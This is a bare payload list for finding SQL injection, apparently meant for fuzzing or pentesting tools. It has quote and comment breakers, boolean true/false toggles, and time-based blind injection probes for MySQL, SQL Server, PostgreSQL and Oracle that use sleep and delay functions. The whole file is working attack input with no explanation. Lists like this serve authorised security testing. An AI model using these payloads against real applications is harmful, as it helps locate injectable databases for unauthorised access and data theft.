'-- 
"-- 
)-- 
) /*

# Boolean toggles
 AND 1=1-- 
 AND 1=2-- 

# MySQL
 AND IF(1=1,SLEEP(5),0)-- 
 AND IF(1=2,SLEEP(5),0)-- 

# SQL Server
 ;IF(1=1) WAITFOR DELAY '0:0:5'-- 
 ;IF(1=2) WAITFOR DELAY '0:0:5'-- 

# PostgreSQL
 AND CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END-- 
 AND CASE WHEN (1=2) THEN pg_sleep(5) ELSE pg_sleep(0) END-- 

# Oracle
 AND CASE WHEN (1=1) THEN dbms_pipe.receive_message(('a'),5) ELSE NULL END FROM dual
 AND CASE WHEN (1=2) THEN dbms_pipe.receive_message(('a'),5) ELSE NULL END FROM dual

